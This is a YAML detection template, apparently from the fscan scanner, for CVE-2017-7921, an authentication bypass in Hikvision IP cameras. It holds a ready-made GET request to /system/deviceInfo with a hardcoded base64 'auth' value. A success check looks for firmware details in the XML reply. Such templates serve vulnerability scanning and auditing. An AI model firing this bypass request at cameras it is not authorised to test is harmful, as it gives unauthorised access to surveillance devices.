fscan/WebScan/pocs/hikvision-cve-2017-7921.yml

name: poc-yaml-hikvision-cve-2017-7921
rules:
  - method: GET
    path: /system/deviceInfo?auth=YWRtaW46MTEK
    follow_redirects: false
    expression: |
      response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"<firmwareVersion>")      
detail:
  author: whwlsfb(https://github.com/whwlsfb)
  links:
    - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html